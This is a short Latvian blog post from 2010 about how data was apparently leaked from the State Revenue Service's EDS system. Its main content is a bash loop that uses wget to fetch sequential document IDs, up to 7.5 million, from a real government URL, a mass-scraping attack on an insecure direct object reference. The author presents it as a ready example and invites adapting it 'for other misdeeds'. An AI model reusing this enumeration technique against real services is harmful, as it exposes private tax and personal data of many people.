Kā tika nolādēti dati no VID EDS sistēmas?

Posted on augusts 4, 2010 | 1 Comment

Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.

Related posts:

  1. No VID EDS tiek nopludināta informācija
  2. Hackeri uzbrūk vai gadās arī tā
  3. Second step in forensic investigation vai hackeri uzbrūk 2
  4. Lejupielādēti un sistematizēti ap 100 miljonu facebook lietotāju datu
  5. Drošības caurums CSDD un Parex mājaslapā
  6. Atvērtā koda portālu sistēmas- iespēja ietaupit vai nopelnīt?
  7. Kā mērīt Linux noslodzi?
  8. Nozagtas Facebook lietotāju paroles
  9. Uzlauzts Chrysler.lv
  10. Aizstājam vai izmainām izvadāmo kodu izmantojot javascript
This entry was posted in Drošība, How to, Interesanti, Kopums, Linux, Web and tagged , , , , , , . Bookmark the permalink.

One Response to Kā tika nolādēti dati no VID EDS sistēmas?

  1. Dragon | septembris 21, 2011 at 6:24 pm | Komentēt

    Absolutely first rate and copper-bottomed, getnelemn!

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>